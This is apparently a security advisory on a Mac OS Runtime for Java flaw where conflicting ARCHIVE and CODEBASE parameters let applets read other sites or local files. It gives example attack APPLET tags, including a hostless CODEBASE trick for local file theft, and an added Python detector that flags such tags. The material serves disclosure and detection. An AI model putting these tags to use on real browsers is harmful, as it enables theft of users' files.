Title: Apple Macintosh MRJ Unauthorized File Access Vulnerability
Severity: MODERATE
Description:
A vulnerability exists in certain versions of the Mac OS Runtime for Java (MRJ). This Java execution system is a standard component of all recent MacOS versions. In addition, certain third-party Macintosh web browsers which use MRJ, including Internet Explorer 4.5 and 5, Netscape 6, iCab and others, are vulnerable.
The MRJ fails to properly enforce the security controls of the Java runtime environment when the values of the ARCHIVE parameter and the CODEBASE parameter conflict. This may allow a malicious Java applet downloaded from a website to access the local filesystem or unauthorized websites when executed.
The ARCHIVE parameter is used in HTML to designate information used in loading a Java applet. If an applet is kept at a separate URL from the HTML document which loads it, the CODEBASE parameter is used to specify the name of the .class file and its URL. As a security feature, the MRJ restricts what the applet can access -- it can only access files from the server specified in either the ARCHIVE or CODEBASE parameters.
This security feature is flawed in the situation where the CODEBASE and ARCHIVE parameters are both set. When this is the case, the applet can access files at either location.
In the following example, the use of the APPLET parameter implies that "Test.jar" is in the same directory as the HTML file, and is to be loaded from this location. If, however, the two parameters are combined,
<APPLET CODE="Test"
CODEBASE="http://www.victim.com/"
ARCHIVE="http://www.malicious.com/exploit.jar">
the applet would then be able to access files at victim.com, despite its being downloaded from malicious.com, bypassing security restrictions.
By specifying CODEBASE="http:///", files on the user's local machine can be accessed by the applet. This could lead to files being stolen by a malicious applet and uploaded to the rogue server.
Properly exploited, this vulnerability can allow an attacker to further compromise the security of the affected host.
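The conflict described above can be detected in served or proxied HTML. The following is an added example, not part of the original advisory or any vendor tool: a Python check that flags APPLET tags whose ARCHIVE origin differs from the CODEBASE origin, or whose CODEBASE is an absolute URL with no host. The function names, finding labels and the www.example.test page URL are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}

def origin(url):
    """(scheme, host, port) triple used to compare where code comes from."""
    p = urlsplit(url)
    scheme = p.scheme.lower()
    return (scheme, (p.hostname or "").lower(), p.port or DEFAULT_PORTS.get(scheme))

class AppletAudit(HTMLParser):
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.findings = []  # tuples of (kind, codebase, archive)

    def handle_starttag(self, tag, attrs):
        if tag != "applet":  # HTMLParser lowercases tag and attribute names
            return
        a = {k: (v or "").strip() for k, v in attrs}
        raw_cb = a.get("codebase", "")
        cb = urlsplit(raw_cb)
        # Absolute CODEBASE with no host (e.g. "http:///"): the advisory's local-file case.
        if cb.scheme and not cb.hostname:
            self.findings.append(("hostless-codebase", raw_cb, a.get("archive", "")))
            return
        codebase = urljoin(self.page_url, raw_cb)  # empty CODEBASE -> the page's own URL
        for item in a.get("archive", "").split(","):  # ARCHIVE is a comma-separated list
            if not item.strip():
                continue
            archive = urljoin(codebase, item.strip())  # relative archives resolve against CODEBASE
            if origin(archive) != origin(codebase):
                self.findings.append(("origin-conflict", codebase, archive))

def audit_applets(html, page_url):
    parser = AppletAudit(page_url)
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample page; host names are the ones used in the advisory's example.
SAMPLE = """<applet code="Test" archive="Test.jar"></applet>
<APPLET CODE="Test"
CODEBASE="http://www.victim.com/"
ARCHIVE="http://www.malicious.com/exploit.jar"></APPLET>
<applet code="Test" codebase="http:///" archive="http://www.malicious.com/exploit.jar"></applet>"""

if __name__ == "__main__":
    for finding in audit_applets(SAMPLE, "http://www.example.test/index.html"):
        print(*finding)
```

The first tag in the sample (ARCHIVE alone, relative to the page) produces no finding; the other two are reported.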
Note that in addition to the current (2.2.3) version, previous MRJ versions, and products which use them, may also be vulnerable.
It was reported to SecurityFocus by Dennis E. Mateik <Dennis.Mateik@honeywell-tsi.com> that this vulnerability was not found on an installation running Netscape 4.61 on Mac OS 9.0.4.
Affected Products:
- Alexander Clauss & iCab Company iCab 2.0.0pre
- Apple Mac OS 7 7.0.0
- Apple Mac OS 8 8.0.0
- Apple Mac OS 9 9.0.0
- Apple Macintosh Runtime for Java 2.2.3
- Microsoft Internet Explorer Macintosh Edition 4.5.0
- Microsoft Internet Explorer Macintosh Edition 4.5.0 MRJ 2.1.4
- Microsoft Internet Explorer Macintosh Edition 4.5.0 MRJ 2.2
- Microsoft Internet Explorer Macintosh Edition 4.5.0 Microsoft VM
- Microsoft Internet Explorer Macintosh Edition 5.0.0
- Netscape Netscape 6.0.0 Mac